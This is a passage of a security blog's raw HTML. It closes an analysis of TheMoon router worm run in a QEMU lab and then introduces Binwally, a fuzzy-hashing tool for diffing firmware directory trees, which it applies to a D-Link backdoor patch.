<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSdshMX58B1lg8k2qW_wmDi1AcnKKWutRGSy1eZ_A0gs7cB0cIg3sUV1DiR4w8O35UCh36XN4IDzwV7U1tCPDeudw4mbSC-4eNvGEdpCH2uNnVsw7Na-hIr2DsXs7SBch5wiJqbPjFv298/s1600/scanss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSdshMX58B1lg8k2qW_wmDi1AcnKKWutRGSy1eZ_A0gs7cB0cIg3sUV1DiR4w8O35UCh36XN4IDzwV7U1tCPDeudw4mbSC-4eNvGEdpCH2uNnVsw7Na-hIr2DsXs7SBch5wiJqbPjFv298/s1600/scanss.PNG" height="234" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBdNSJ-O6R_r_WFcmbCnuGHCf7Q5Ki4FvHTBR33_WFFTdTmU6hDcjxgr7TXDzgL_mz2V_FUPuGAfSJmL15cpDUwQdF-qfch59BrxzcORmUF0o7ZyldvkOgfKfZFSGZZQpliXNejcVzyyQ3/s1600/diaida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBdNSJ-O6R_r_WFcmbCnuGHCf7Q5Ki4FvHTBR33_WFFTdTmU6hDcjxgr7TXDzgL_mz2V_FUPuGAfSJmL15cpDUwQdF-qfch59BrxzcORmUF0o7ZyldvkOgfKfZFSGZZQpliXNejcVzyyQ3/s1600/diaida.png" height="566" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1jNJabadgbvJJN6pSiqaXBpMxTA5EnhQNEu0Qmn2BNV5CicuKKOFSsbvSyZVsiUKUzhdGCyyrW9HuJ7zhhJDY-UK0JC-_Eg1XIkStg7hvIY7hKlx90DWZDY0ROir4FQHBCLQAq65jgJwm/s1600/w1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1jNJabadgbvJJN6pSiqaXBpMxTA5EnhQNEu0Qmn2BNV5CicuKKOFSsbvSyZVsiUKUzhdGCyyrW9HuJ7zhhJDY-UK0JC-_Eg1XIkStg7hvIY7hKlx90DWZDY0ROir4FQHBCLQAq65jgJwm/s1600/w1.PNG" height="424" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTv8a2YC-cMLMT2Aty8fzbpXsQ13L8Y8kPOtBpoduBA8zaNtnA3i85hJzFqbgbhzcpyaBpAGSQ6MQyHRILCmk-nmqSbIJRDK6M7CIheLt9l1NojoIJDCpOfkpVtBKkwlyMYd3xDsS8dWsk/s1600/w2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTv8a2YC-cMLMT2Aty8fzbpXsQ13L8Y8kPOtBpoduBA8zaNtnA3i85hJzFqbgbhzcpyaBpAGSQ6MQyHRILCmk-nmqSbIJRDK6M7CIheLt9l1NojoIJDCpOfkpVtBKkwlyMYd3xDsS8dWsk/s1600/w2.PNG" height="414" width="640" /></a></div>
<br />
Decoded POST:<br />
<br />
<script src="https://gist.github.com/bmaia/9042580.js"></script>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
TheMoon will also start an HTTPS server ("Lunar Base") on the router using the random port identified on the .L26.lunar file. The certificate's Common Name, Organization and Organizational Unit are hardcoded and other values seem to be random. Trying to find these entries on <a href="https://scans.io/">scans.io</a> SSL certificates datasets would be really interesting.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwVazpgcEu3nr74FKYyVZEKO6JA3rqvpKcv0uBDcsz0weXakpZAVjTQ-J-r4GVOx8_OhVhxf9t2ATXfIRqfbe8a9pHIUems1f-i0vBHhTThS0s0NEafyYDUpCZyEqbQTgY8aQsl5ppCbNA/s1600/output_Su1S8R.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwVazpgcEu3nr74FKYyVZEKO6JA3rqvpKcv0uBDcsz0weXakpZAVjTQ-J-r4GVOx8_OhVhxf9t2ATXfIRqfbe8a9pHIUems1f-i0vBHhTThS0s0NEafyYDUpCZyEqbQTgY8aQsl5ppCbNA/s1600/output_Su1S8R.gif" height="400" width="375" /></a></div>
<br />
The HTTPS server hosts three files: gerty.png, lunar.png and favicon.ico:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOcNzTOScjoyRioEZpGl2MhbQSrwG6LA7IMom099x32Bgw1t8-GxqerHVAWynZFaQY5cVzY1BBxzZVumuPE6bDGUE-aEK5zjoKRph6tqQ0XFaevSiO4Hxp-cc-gidK-RR2F3Ix89xkCZA3/s1600/Screenshot-Terminal-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOcNzTOScjoyRioEZpGl2MhbQSrwG6LA7IMom099x32Bgw1t8-GxqerHVAWynZFaQY5cVzY1BBxzZVumuPE6bDGUE-aEK5zjoKRph6tqQ0XFaevSiO4Hxp-cc-gidK-RR2F3Ix89xkCZA3/s1600/Screenshot-Terminal-12.png" height="425" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHh_W9WwijoY1ThY1GQ0NaiYKE0Ui0yL00pszT9DoZRbgdcEm1MoDgLim4WRj4kzUQNFQhPsOVbDfq_bzOHSFWFIabmoKq1yncduUkARXbn5wQuc-htlCLPgs2nkzMZMaVEPoXyWPvoi99/s1600/Screenshot-gerty.png+(PNG+Image,+285%C2%A0%C3%97%C2%A0196+pixels)+-+Mozilla+Firefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHh_W9WwijoY1ThY1GQ0NaiYKE0Ui0yL00pszT9DoZRbgdcEm1MoDgLim4WRj4kzUQNFQhPsOVbDfq_bzOHSFWFIabmoKq1yncduUkARXbn5wQuc-htlCLPgs2nkzMZMaVEPoXyWPvoi99/s1600/Screenshot-gerty.png+(PNG+Image,+285%C2%A0%C3%97%C2%A0196+pixels)+-+Mozilla+Firefox.png" height="465" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi74rDCMGsh8kru6xI733iB9jTG3LL7JWntwXM6ezSvL22CuUgthOVawvAwtCXeT1waxXhr2_tN1m266cA1FaARDhChvbEsvhZCwotfDQ8-d6-_uGpz2usxCLIK1g5Kz0apiXDMFSTQwwaJ/s1600/Screenshot-Terminal-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi74rDCMGsh8kru6xI733iB9jTG3LL7JWntwXM6ezSvL22CuUgthOVawvAwtCXeT1waxXhr2_tN1m266cA1FaARDhChvbEsvhZCwotfDQ8-d6-_uGpz2usxCLIK1g5Kz0apiXDMFSTQwwaJ/s1600/Screenshot-Terminal-11.png" height="294" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Rkhunter reports a few warnings on the infected system. I have upload the complete output from rkhunter to Pastebin, get it <a href="http://pastebin.com/CSkh2jJ5">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHPoV5qSI6P6sG8UYNFh1XheTohjXv9CkI63EPFBLdWhbxvAr9NOEOSiO8MTZ3XX9UAHMngK5P-G4W3uEV2eZ_S4H08kmZRawAPJc2PSFjQnxZ_9GnM2RExU0xLmOU-D5wx9-2fNcDArKe/s1600/Screenshot-Terminal-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHPoV5qSI6P6sG8UYNFh1XheTohjXv9CkI63EPFBLdWhbxvAr9NOEOSiO8MTZ3XX9UAHMngK5P-G4W3uEV2eZ_S4H08kmZRawAPJc2PSFjQnxZ_9GnM2RExU0xLmOU-D5wx9-2fNcDArKe/s1600/Screenshot-Terminal-13.png" height="442" width="640" /></a></div>
<br />
Another useful technique is to compare the contents from the filesystem with a known good template. You can use <a href="http://w00tsec.blogspot.com.br/2013/12/binwally-directory-tree-diff-tool-using.html">binwally</a>, <a href="http://winmerge.org/">WinMerge</a> or <a href="https://github.com/devttys0/binwalk/blob/master/src/binwalk/modules/hashmatch.py">binwalk's hashmatch</a>.<br />
<br />
<script src="https://gist.github.com/bmaia/9042869.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdmg1oOR09HtOIWvG9IJghQ9jvc_jI8lFtOaW8jbR7LW4KcTtXl2q7A0HbNjek_MtCX6l82ei5yH7WlftKv-76ynRofIcLGf9tlPWAp8be-JPZa7-pZLI7Jl9ZUR0Fvw30VqWVdqco_WBL/s1600/Screenshot+from+2014-02-16+15%255E%252544%255E%252522.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdmg1oOR09HtOIWvG9IJghQ9jvc_jI8lFtOaW8jbR7LW4KcTtXl2q7A0HbNjek_MtCX6l82ei5yH7WlftKv-76ynRofIcLGf9tlPWAp8be-JPZa7-pZLI7Jl9ZUR0Fvw30VqWVdqco_WBL/s1600/Screenshot+from+2014-02-16+15%255E%252544%255E%252522.png" height="398" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3PGhrP5claI6kMOOJy5YjvE0qso_genqN0ZGMBOTbWW4hjgQN3SDWxUmGK1CPEvgGjigKp2ubQ8G4Eq2SZ2sFL6DneT3H_qVhgoZpii6Qb7zsbxalvoU-nofPAuuXrIJmeQcrv5r2YaSl/s1600/Screenshot+from+2014-02-16+15%5E%2544%5E%2554.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3PGhrP5claI6kMOOJy5YjvE0qso_genqN0ZGMBOTbWW4hjgQN3SDWxUmGK1CPEvgGjigKp2ubQ8G4Eq2SZ2sFL6DneT3H_qVhgoZpii6Qb7zsbxalvoU-nofPAuuXrIJmeQcrv5r2YaSl/s1600/Screenshot+from+2014-02-16+15%5E%2544%5E%2554.png" height="398" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Conclusion</b><br />
<div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;">
<div style="margin: 0px;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
</div>
<div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;">
<div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;">
<div style="margin: 0px;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
I did not spend much time reversing the files and its functions as the main purpose of this post was to provide information to identify and execute embedded binaries, describing how to set your own virtual lab using QEMU.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
It's still possible to improve the analysis by <a href="https://github.com/zcutlip/nvram-faker">faking the nvram</a>, by <a href="http://wiki.qemu.org/Documentation/Debugging">running a GDB server with QEMU</a> or using <a href="https://code.google.com/p/volatility/issues/detail?id=436">Volatility with the proper profile and debugging structures</a>, but this post is already way too long. You should also have a look on <a href="http://www.s3.eurecom.fr/tools/avatar/">Avatar</a>, from <a href="http://www.eurecom.fr/rs/system_security_group">EURECOM</a>. Avatar's goal is to enable complex dynamic analysis of embedded firmware in order to assist in a wide range of security-related activities, including malware analysis, reverse engineering and vulnerability discovery.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="margin: 0px;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
Let's keep drawing public awareness on the security issues of the Internet of Threats, persuading manufactures, ISP's and final users to collaborate to address these problems.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com11tag:blogger.com,1999:blog-3296471108082693838.post-78173567823852060732013-12-03T10:53:00.000-02:002013-12-10T17:36:29.083-02:00Binwally: Directory tree diff tool using Fuzzy HashingFor this post, I'll discuss about the concept of directory tree and binary diffing and how it could be used to find potential vulnerabilities and security issues that were (silently) patched on firmware images.<br />
<br />
Silent patching is a big deal as we don't have many security researchers like <a href="http://www.h2hc.org.br/h2hc/en/palestrantes#Speaker1">Spender</a> around. This is a common practice among companies that create software and firmwares for embedded devices. Changelogs from new firmwares often contains few information about security issues, outlining the changes as "bugfixes" or "enhancements": we get no CVE's and we don't know how critical the flaws are.<br />
<br />
In addition to that, you may occasionally find some reference for the string <a href="http://www.aldeid.com/wiki/Exploits/proftpd-1.3.3c-backdoor">'Ac1db1tch3z' on your code</a> (which means that you got a free vulnerability assessment) or your employee <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">Joel might forget to remove a backdoor from the firmware</a>. Diffing the content from previous firmwares may be useful to find out when these backdoors were first installed, modified and/or removed.<br />
<br />
I introduce you to Binwally: a simple script to perform directory tree diffing using the concept of Fuzzy Hashing (<a href="http://ssdeep.sourceforge.net/">ssdeep</a>) to define a matching score between binaries.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjniDyzvYttnsln13RtUPbTiePL5i8O9fj8AkVqGZ9M1bqYsm_WMrHIPvk6o0D5CfPqSreaR2gwiZSiL_Lh09DuV3OfYOzxsuBuZRZ6q-RHOvGtf_YeLr8OEHxluExdPPIxnUP7CQAT77b0/s1600/binwally.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjniDyzvYttnsln13RtUPbTiePL5i8O9fj8AkVqGZ9M1bqYsm_WMrHIPvk6o0D5CfPqSreaR2gwiZSiL_Lh09DuV3OfYOzxsuBuZRZ6q-RHOvGtf_YeLr8OEHxluExdPPIxnUP7CQAT77b0/s320/binwally.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Binwally says "no" to Silent Patching</td></tr>
</tbody></table>
<br />
<b>Fuzzy Hashing</b><br />
<br />
Fuzzy Hashing, also know as context triggered piecewise hashes (CTPH), can match inputs that have homologies. Such inputs have sequences of identical bytes in the same order, although bytes in between these sequences may be different in both content and length. The concept was introduced by <a href="https://github.com/tridge">Andrew Tridgell</a> and the most well-known tool is <a href="http://ssdeep.sourceforge.net/">ssdeep</a>, created by <a href="https://twitter.com/jessekornblum">Jesse Kornblum</a>.<br />
<br />
The usage example outlined on <a href="http://ssdeep.sourceforge.net/usage.html">ssdeep's homepage</a> summarizes it well:<br />
<div class="code">
$ ls -l foo.txt<br />
-rw-r--r-- 1 jessekor jessekor 240 Oct 25 08:01 foo.txt</div>
<div class="code">
$ cp foo.txt bar.txt<br />
$ echo 1 >> bar.txt</div>
<br />
A cryptographic hashing algorithm like MD5 can't be used to match these files; they have wildly different hashes.<br />
<div class="code">
$ md5deep foo.txt bar.txt<br />
7b3e9e08ecc391f2da684dd784c5af7c /Users/jessekornblum/foo.txt<br />
32436c952f0f4c53bea1dc955a081de4 /Users/jessekornblum/bar.txt</div>
<br />
But fuzzy hashing can! We compute the fuzzy hash of one file and use the matching mode to match the other one.<br />
<div class="code">
$ ssdeep -b foo.txt > hashes.txt<br />
$ ssdeep -bm hashes.txt bar.txt<br />
bar.txt matches foo.txt (64)</div>
<br />
The number at the end of the line is a match score, or a weighted measure of how similar these files are. The higher the number, the more similar the files.<br />
<div>
<br /></div>
<b>Binwally</b><br />
<br />
Binwally is a simple Python script that uses this concept to diff directory trees in order to find different, unique and matching files, displaying an overall score of the results. It was based on diffall.py from the book <a href="http://www.amazon.com/Programming-Python-Mark-Lutz/dp/0596158106/">Programming Python (4th Edition)</a> and it requires <a href="https://github.com/DinoTools/python-ssdeep">python-ssdeep</a>, a wrapper for <a href="http://ssdeep.sourceforge.net/">ssdeep</a> (which is coded in C). You can download the script from my Github, following the link below:<br />
<br />
<ul>
<li><a href="https://github.com/bmaia/binwally">Download Binwally</a></li>
</ul>
<br />
The code is pretty straightforward, it takes two dirs/files as arguments and displays which files are unique, the ones that matches and the ones that differs and their match score. It still needs some improvement (the matching score is based on the number of files and don't consider the filesizes for example) but it works fine for what it purposes to accomplish.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvychPvCQhdnJs9n5O71TD8HjKRHpFbWvgfbnZjQGz8AglOqu1mYXTisAeUQucyUbZTf3cgdQsSpKTx7PJIFgEXQTPzTal3NXdrhbQqXGiPmp1a048jHuuPh_2f3kFdDRio4FcX8YzkTo/s1600/bin1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvychPvCQhdnJs9n5O71TD8HjKRHpFbWvgfbnZjQGz8AglOqu1mYXTisAeUQucyUbZTf3cgdQsSpKTx7PJIFgEXQTPzTal3NXdrhbQqXGiPmp1a048jHuuPh_2f3kFdDRio4FcX8YzkTo/s400/bin1.png" width="400" /></a></div>
<br />
Comparing two directory trees from a firmware unsquased using Binwalk and firmware-mod-kit:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1v6lFpNffqSy-eOf28m94S6vv2I90164ViYU9XtZyklln4zs3FgT1a33LB5szyECnYBgZcxH1yI0gk0IC1R1CmDk8K0CzHZ-I_jOslnPKVhfDmLxfvuerOh06OD64VG3RRcMfqeeCppqL/s1600/bin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1v6lFpNffqSy-eOf28m94S6vv2I90164ViYU9XtZyklln4zs3FgT1a33LB5szyECnYBgZcxH1yI0gk0IC1R1CmDk8K0CzHZ-I_jOslnPKVhfDmLxfvuerOh06OD64VG3RRcMfqeeCppqL/s640/bin2.png" width="640" /></a></div>
<br />
You can already achieve this using <a href="http://winmerge.org/">Winmerge</a>, but the tool does not display a matching score, it's not command line based and not scriptable. You can check my <a href="http://w00tsec.blogspot.com/2013/08/simet-box-firmware-analysis-embedded.html">previous post</a> describing how to use it to differ firmware images.<br />
<br />
Binwally is best used with <a href="https://github.com/devttys0/binwalk/">Binwalk</a>, that's why I'll talk to <a href="https://twitter.com/devttys0">devttys0</a> to merge it with his tool (maybe a new command line switch under the Binary Diffing options). Binwalk already supports binary diffing (-H switch), but it will just compare files and firmware images. The problem is that firmware images are usually packed, encrypted and/or compressed. When you unpack and compare the extracted files and their directory tree, you have much more valuable information. If you disassemble the code and compare the results again, you get even better data - this is what <a href="http://www.zynamics.com/bindiff.html">bindiff</a> from Zynamics/Google does pretty well. The Insinuator blog has a nice <a href="http://www.insinuator.net/2013/07/reverse-engineering-tools/">example on how to use bindiff for RE</a>.<br />
<br />
<b>Binwally Usage: Dissecting DLink Backdoor Patch</b><br />
<br />
So you may have heard recently that some DLink routers <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">had a backdoor</a> and that a <a href="http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10001">security update</a> was issued to address the vulnerability.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNpXkWUOLm8Xgjkw17ENv_AGJGOIvU_jMR2dZkn216HHRv4XfzyQMjF_7i6e0MQG5Jcu7OAgQQT8ryGQqeV3-grzdyhekxpRKj4-HDnyiQ4ugvjX9liXChfluBTvQrgmjMN4ORdETbxOEO/s1600/dlink1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNpXkWUOLm8Xgjkw17ENv_AGJGOIvU_jMR2dZkn216HHRv4XfzyQMjF_7i6e0MQG5Jcu7OAgQQT8ryGQqeV3-grzdyhekxpRKj4-HDnyiQ4ugvjX9liXChfluBTvQrgmjMN4ORdETbxOEO/s320/dlink1.png" width="319" /></a></div>
According to <a href="https://www.schneier.com/">Bruce Schneier</a>, we should "Trust but verify": that's what we are going to do here. First let's download the <a href="ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_reva_113_ALL_en_20110915.zip">backdoored version (v1.13)</a> and the <a href="ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_revA1_114wwb02_all_en_20131112.zip">patched version (1.14)</a> from DLink's FTP. Next step is to extract the firmware images (binwalk -e DIR100A1_FW114WWB02.bix DIR100_v5.0.0EUb3_patch02.bix) and compare the directory trees using Binwally:<br />
<br />
<div class="code">
$ python binwally.py _DIR100_v5.0.0EUb3_patch02.bix.extracted/ _DIR100A1_FW114WWB02.bix.extracted/
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv3j4AeDMBL0v_3RNgKsmp9GtEauxGWnmOAjuX_P2WwEVATjygKzxCAhoaIYkq93QFNox0smiarPFPYx5RWZ4WJOE4FQdRKeadZmAfWK_LxFrY8pGAcuawWmb3naEoi4dawe20DDV9-l5-/s1600/bin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv3j4AeDMBL0v_3RNgKsmp9GtEauxGWnmOAjuX_P2WwEVATjygKzxCAhoaIYkq93QFNox0smiarPFPYx5RWZ4WJOE4FQdRKeadZmAfWK_LxFrY8pGAcuawWmb3naEoi4dawe20DDV9-l5-/s640/bin3.png" width="594" /></a></div>
<br />
I removed the matching files and symlinks for better reading, but the analysis is now narrowed to a small set of files. According to the release notes, a minor PPoE dial up issue was also fixed, that may be the reason why "/bin/pppd" had differences.<br />
<br />
Some files like the "/www/Home/bsc_lan.htm" have a matching score of 100 even though they have different content and MD5, for example. This is due to the nature of Fuzzy Hashing, as the small modification was not enough to change the fuzzy hash value. It's important to note that files with a "match" result do actually have the same content and also have a matching score of 100.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZWI5oIskpIppTiW3KNe80TjicAuVurCTpceUilQZQXFgyKBkACFE7U5xTo9DrVqj9da9b3ZpaoBXrXIHTMlMaNPslXo2sQVAVfDkbVuv0fXoooNWV6Drizba0AnjGbC7-lx50NNJTSs2O/s1600/wingerge1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZWI5oIskpIppTiW3KNe80TjicAuVurCTpceUilQZQXFgyKBkACFE7U5xTo9DrVqj9da9b3ZpaoBXrXIHTMlMaNPslXo2sQVAVfDkbVuv0fXoooNWV6Drizba0AnjGbC7-lx50NNJTSs2O/s640/wingerge1.png" width="640" /></a></div>
<br />
There's a new Shell script on the patched 1.14 firmware, located at "/etc/wdhttp.sh". It seems that Joel "do not know how to write sash loop command ugly code":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji7waULo4Mp6iu2t8SkP9OVVyRmSHyWv48TjT089sLbfA3UBegFjxZj4hKgHwsZ6Gw-eJiGS-8Dq-0cLFwCZND6b_KRiCoaWl5ObFb8RD8yPDkh4jIrA2wHPq0d-PAlN0bN2hS01N0HevH/s1600/wdhttp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji7waULo4Mp6iu2t8SkP9OVVyRmSHyWv48TjT089sLbfA3UBegFjxZj4hKgHwsZ6Gw-eJiGS-8Dq-0cLFwCZND6b_KRiCoaWl5ObFb8RD8yPDkh4jIrA2wHPq0d-PAlN0bN2hS01N0HevH/s640/wdhttp.png" width="640" /></a></div>
<br />
Busybox was another binary that had a different pattern. <a href="http://w00tsec.blogspot.com/2013/09/analyzing-and-running-binaries-from.html">Running them using QEMU</a> shows that they still have the same version (v1.0.0-pre2) and different compile dates (2011.09.15 and 2013.10.31).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZE0DOCvIN59YWPQN13eyIMvo02z6uWFxuU7O70hwEkAapEh1AAJj3gBAilVp0Yl00JE52X4L6dBBOmEe760HMNbYPq3L3_mrDbhyphenhyphenJYzsw3Rnf15hmFYwPxmcysdZdkHhQKs-Q8HKQ0c00/s1600/busy1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZE0DOCvIN59YWPQN13eyIMvo02z6uWFxuU7O70hwEkAapEh1AAJj3gBAilVp0Yl00JE52X4L6dBBOmEe760HMNbYPq3L3_mrDbhyphenhyphenJYzsw3Rnf15hmFYwPxmcysdZdkHhQKs-Q8HKQ0c00/s640/busy1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
